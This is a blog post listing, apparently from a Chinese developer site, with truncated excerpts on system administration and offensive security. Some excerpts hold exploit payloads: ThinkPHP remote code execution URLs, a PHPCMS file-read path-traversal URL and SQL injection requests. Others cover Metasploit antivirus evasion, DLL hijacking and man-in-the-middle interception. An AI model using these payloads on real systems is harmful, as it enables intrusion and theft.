- 博客(322)
- 收藏
- 关注
RSS订阅原创 Ubuntu挂载NTFS格式的磁盘
在Ubuntu系统中,要挂载NTFS格式的磁盘,你需要使用ntfs-3g这个软件。以下是安装和挂载NTFS分区的步骤: 安装ntfs-3g:sudo apt-updatesudo apt-get install ntfs-3g 找到你想要挂载的NTFS分区的设备文件,例如/dev/sda1。 创建一个挂载点,例如/mnt/myntfs:sudo mkdir /mnt...
2024-07-22 23:36:00
561
原创 避坑-宝塔8.2.0版本bug 有二级目录的网站切勿更新到8.2.0版本,要是更新的可以退回8.0.6版本...
wget -O update.sh https://download.bt.cn/install/update_beta.sh && bash update.sh 8.0.6安装新版本宝塔的情况下再执行以上命令
2024-07-22 23:33:00
96
原创 html javascript 设置cookie永不过期
function cookieToJson(str) { let cookieArr = str.split(";"); let obj = {} cookieArr.forEach((i) => { let arr = i.split("="); obj[arr[0]] =arr[1]; }); retu...
2021-01-15 16:39:00
1459
原创 在线cookie转json, 在线chrome请求 转python代码, 在线chrome请求转php代码
在线cookie转json 点击运行在线运行:function cookieToJson(str) { let cookieArr = str.split(";"); let obj = {} cookieArr.forEach((i) => { let arr = i.split("="); obj[arr[0...
2021-01-14 14:05:00
543
原创 js加密字符串
/* * 字符串加密 * 用javascript对字符串进行加密,应用于参数传递等。 * 默认加密密钥为kb1234,使用者可自定义修改。 * 注意加密密钥应和解密密钥相同。 * 算法来自于互联网 * 使用方法: * 加密 * var code = kbt.encrypt('我爱北京天安门'); * alert(code); * 解密 * var str = k...
2021-01-13 14:42:00
746
原创 cookie利用代码
1<html> <head> <meta charset="utf-8"> </head> <body> </body> <script> </script> <script> //通过co...
2021-01-11 20:29:00
274
原创 js for循环的同步代码
async function fn() { for(var i=0; i<5; i++) { await (function(){ return new Promise(function(res, rej){ setTimeout(function(){ ...
2020-12-15 22:40:00
1910
2
原创 看我如何用微信上线CobaltStrike
前言 DLL劫持漏洞是老生常谈的一个漏洞,已经被前辈们各种奇技淫巧玩烂。但DLL劫持技术在后渗透和域渗透中的权限提升和权限维持都起到了至关重要的作用。本文简单剖析DLL劫持技术并通过实例应用来查看如何在渗透工作中利用此项技术。篇幅稍长,各位读者耐心观看,文中有不妥之处请各位加以斧正。DLL劫持原理什么是DLL? DLL是动态链接库文件,在Windows系统中,应用程序并不是一...
2020-12-11 17:44:00
2575
原创 记录注入
ZB.at.J("user/login", "post", { user_name: "GT09", user_pass: "GTN6"}, function(e) { console.log(e)})ZB.at.J("user/login", "post", { user_name: 'GT1")-- --', user_pass: ...
2020-11-26 14:10:00
89
原创 php单文件管理器:
前言: 项目开发过程中,网站一般部署到远程服务器,所以文件管理就不能和本机操作一样方便。通常文件管理是用ftp下载到本地,修改后再上传,或者远程登录到服务器进行修改。但是这些操作都依赖于复杂的第三方软件。如果只是想简单修改网站中一个页面中的文字,或查看文件代码,相对于繁琐的使用第三方软件进行操作的流程,如果有一个小程序能在线操作文件,那就能方便快速达到自己的需求了。所以,SuExpl...
2020-10-06 00:08:00
487
2
原创 C编译:make和cmake的区别
1.gcc是GNU Compiler Collection(就是GNU编译器套件),也可以简单认为是编译器,它可以编译很多种编程语言(括C、C++、Objective-C、Fortran、Java等等)。2.当你的程序只有一个源文件时,直接就可以用gcc命令编译它。3.但是当你的程序包含很多个源文件时,用gcc命令逐个去编译时,你就很容易混乱而且工作量大4.所以出现了make工具make...
2020-09-22 16:57:00
419
原创 cmd和bash,git设置代理的方法
git config --global --unset http.proxygit config --global --unset https.proxynpm config delete proxygit config --global http.proxy 'socks5://127.0.0.1:1082'git config --global https.proxy ...
2020-09-07 13:59:00
352
原创 inject某网站延时注入代码
GET /down.php/1' UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- --/bb HTTP/1.1Host: yyy.xxx.cnConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1U...
2020-06-03 16:53:00
210
原创 PHPCMS某处设计缺陷可致authkey泄露 【针对6.5.7版本的payload生成代码】
11<?php/*** 字符串加密、解密函数*** @param string $txt 字符串* @param string $operation ENCODE为加密,DECODE为解密,可选参数,默认为ENCODE,* @param string $key 密钥:数字、字母、下划线* ...
2020-03-22 13:28:00
239
原创 SQLMAP注入json格式数据
当注入点在json格式数据中时,SQLMAP可能会犯傻,导致找不到注入点,使用-p指定参数又不好指定json格式中的字段, 这个时候就需要人工修改一下注入的json数据,使SQLMAP能够找到注入参数,导致SQLMAP犯傻的json输入类似如下:{"name":["string"]} 将其修改为以下两种形式都可以使SQLMAP找到该注入点(而不是直接跳过): // 方式...
2020-03-18 13:24:00
1108
原创 PHPcms9.6.3存储型XSS(poc优化版)
漏洞分析 文件路径:/phpcms/modules/member/index.php public function change_credit() { $memberinfo = $this->memberinfo; //加载用户模块配置 $member_setting = getcache('member_...
2020-03-07 00:20:00
749
原创 PHPCMS phpsso_auth_key泄露导致注入 测试环境9.6.0版本,其他版本未具体测试
获取key 通过文件包含漏洞读取phpsso_auth_key (9.5.7中招,v9.6.0没有此漏洞):/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches...
2020-03-06 16:18:00
1127
原创 PHPCMS authkey泄露导致注入 影响版本<=9.6.1
漏洞详情 install/install.php 184行if($module == 'admin') { $cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').''; $authkey = random(20, '1294567890abcdefghigklm...
2020-03-05 16:17:00
680
原创 ThinkPHP 5.1.x远程命令执行漏洞利用, 参考POC
thinkphp5.1.1为例1、代码执行:http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=12、命令执行:http://192.168.0.108/public//index.php?s=index/\think...
2020-02-28 16:59:00
1965
原创 ThinkPHP 5.0远程命令执行漏洞分析与复现
0x00 前言 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。0x01 影响范围ThinkPHP 5.0.5-5.0.22ThinkPHP 5.1...
2020-02-27 23:52:00
1077
1
原创 sqli-宽字节注入
0x0 背景当某字符的大小为一个字节时,称其字符为窄字节.当某字符的大小为两个字节时,称其字符为宽字节.所有英文默认占一个字节,汉字占两个字节常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等0x1 宽字节注入原理程序员为了防止sql注入,对用户输入中的单引号(’)进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sq...
2020-02-17 23:19:00
165
原创 Burp Suite学习之Intruder的4种攻击模式
burp suit的intruder攻击共有四种模式,如图所示,下面分别讲讲这四种模式的使用方法和场景。一 、Sniper模式 Sniper模式使用一组payload集合,它一次只使用一个payload位置,假设你标记了两个位置“A”和“B”,payload值为“1”和“2”,那么它攻击会形成以下组合(除原始数据外):攻击序列位置A位置B11no re...
2020-02-16 15:08:00
881
1
原创 兄弟们,你们天天吊打面试官,面试官很难受啊。 metasploit免S客户端
metasploit生成的exe文件很小,但是免杀效果不行, 找了很多资料, 只有生成c语言shellcode,然后c#重新编译, 这种免杀效果,挺让人满意的 首先需要生成客户端,客户端使用了ngrok内网穿透, 参考 :https://www.cnblogs.com/diligenceday/p/11009759.html root@kali:~...
2020-01-07 14:30:00
126
原创 Tensorflows安装(cpu版安装方法)
一、说明 首先声明,本人系统是Windows10 64位,Win7未试。 本文旨在帮助园友以更简单的方式安装Tensorflow,下面介绍的是如何安装Python的Tensorflow cpu版本。 Tensorflow依赖于的模块有numpy,matplotlib,jupyter,scikit-image,librosa,nltk,keras,...
2019-09-08 19:14:00
686
原创 Tensorflows安装(cpu版最简安装方法)
一、说明 首先声明,本人系统是Windows10 64位,Win7未试。 本文旨在帮助园友以更简单的方式安装Tensorflow,下面介绍的是如何安装Python的Tensorflow cpu版本。 Tensorflow依赖于的模块有numpy,matplotlib,jupyter,scikit-image,librosa,nltk,keras,...
2019-09-08 19:13:00
119
原创 Metasploit使用内网跳板, 扫描局域网主机
最近,拿到一台内网机器, 苦于无法使用nmap扫描改主机的内网, 所以才有此文 在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。 使用Meterpreter内置的添加路由功能 获取路由信息 run get...
2019-06-21 14:05:00
1258
原创 超实用!手把手教你如何用MSF进行后渗透测试!
在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续需要对系统进行全面的分析,搞清楚系统的用途;如果目标处于一个内网环境中,那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试,更全面地挖掘系统中存在的安全隐患。 本期安仔课堂,ISEC实验室的向老师为大家介绍如何使用...
2019-06-15 18:31:00
335
原创 mestasploit笔记 :MS17-010
实验环境 操作机 :Kali 2017 操作机IP:172.16.11.2 目标机:Windows 7 目标机IP:172.16.12.2 
...
2019-06-12 11:16:00
105
原创 CentOS7.6 X64搭建mysql服务
1、官方安装文档 http://dev.mysql.com/doc/mysql-yum-repo-quick-guide/en/ 2、下载 Mysql yum包 http://dev.mysql.com/downloads/repo/yum/ 下载到本地再上传到服务器,或者使用wget 直接下载 wget http...
2019-05-26 17:46:00
123
原创 Cookie的Secure属性和HttpOnly属性
基于安全的考虑,需要给cookie加上Secure和HttpOnly属性,HttpOnly比较好理解,设置HttpOnly=true的cookie不能被js获取到,无法用document.cookie打出cookie的内容。 Secure属性是说如果一个cookie被设置了Secure=true,那么这个cookie只能用https协议发送给服务器,用http协议是不发送的...
2019-05-18 15:18:00
524
原创 Chrome插件:浏览器后台与页面间通信
content.js 与 background.js和popup.js 通信和background.js与popup.js 这些通信都用 chrome.runtime.sendMessage 这个方法 background.js和popup.js 与 content.js通信 都用chrome.tabs.sendMessage 方法...
2019-05-18 15:16:00
1245
原创 【网络安全】SSLSplit实现中间人攻击
中间人攻击,即在中间监听获取网络数据以便获取的有价值的信息实现攻击破坏的目的,即client-mid man-server,此处介绍的sslsplit可以作为mid man监听ssl信息及HTTP信息。http不做介绍仅仅实现代理功能,ssl实现代理的同时要与服务器建立连接,同时伪造证书与客户端建立连接,即双连接,依据获取的client信息再与服务器通信,从而实现明文数据监听。...
2019-03-08 22:07:00
395
原创 Centos PHP+Apache执行exec()等Linux脚本权限设置的详细步骤
1. 查看一下你的Apache的执行用户是谁: lsof -i:80 运行之后的结果为: 从图中我们可以清楚的看到,httpd(也就是Apache)的执行用户为:exec_shell(注:这是我本机上改过之后的用户,只是用来说明一下,你的肯定不是这个!) lsof 就是 List of file 的缩写,就是列出当前系统打开文件的...
2019-02-01 10:10:00
306
原创 新版本的bettercap不好用, 如何安装和编译旧版本的bettercap
新版本的bettercap2.0以上是用go语言写的, 各种功能感觉还不太完善, 没有原来的用ruby写的好, 想着回退安装bettercap1.6旧版本 系统环境: kali 2017.2 下载源码: git clone https://github.com/sqqihao/bettercap.git &...
2018-11-06 14:45:00
190
原创 window系统命令行设置proxy----Setting a proxy for Windows using the command-line
设置代理, bypass-list的参数是不走代理地址: netsh winhttp set proxy proxy-server="socks=localhost:9090" bypass-list="localhost" 查看当前的代理: netsh winhttp show proxy ...
2018-07-21 15:36:00
495
原创 修改Electron的libcc(libchromiumcontent)源码,重新编译electron, 设置event.isTrusted为true...
VPN非常注意: 编译的过程需要使用VPN, 否者chromium的源代码无法下载, 后面会出现总总问题 Electron的编译环境, 推荐使用物理机: win10 64位 英文版, 为了避免后期出现编译文件, 推荐使用64为的win10 node-v6.11.0-x64, node版本最好在6.x, 高版本的可能编译不成功
...
2018-07-08 09:30:00
303
原创 apache配置伪静态Rewrite
1: 修改apache的httpd.conf文件 找到这一行 #LoadModule rewrite_module modules/mod_rewrite.so 改成 LoadModule rewrite_module modules/mod_rewrite.so 保存httpd.conf ...
2018-03-12 20:22:00
66
原创 sql注入工具:sqlmap命令
sqlmap是一款专业的sql注入工具, 让你告别人工注入, 程序高效自动注入 前提是你有找到注入点 , 工具的官方网站:http://sqlmap.org/ kali系统默认安装sqlmap, 不需要额外安装: sqlmap的命令行帮助: ___ __H__ ___ ...
2018-02-09 21:42:00
74
原创 命令行批量合并视频脚本
批量合并视频头部 需要ffmpeg, 目前直接安装格式工厂, 使用格式工厂模块下的ffmpge.exe, 避免自己去下载源码和编译 ffmpeg合并视频的几种方法 ffmpeg的合并方式有三种, 参考 :这儿, 我选择配置文件合并的方式, 因为其他两种我这边测试无法合并视频: ffmpeg -f concat -...
2018-01-27 00:34:00
939
原创 wifipineapple外接网卡上网
买了一台wifipineapple, pineapple有两种版本, 第一种是3G版本,可以外接3G上网卡, 还有一种是wifi版本, 包含一个物理的网络插槽, 我买的是第二种 wifipineapple包含了一个USB接口, 所以可以通过外接USB网卡, 实现网络的桥接 通过ssh连接到wifipineapple的网络,, 登陆密码为 pineapple...
2018-01-24 00:42:00
152
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人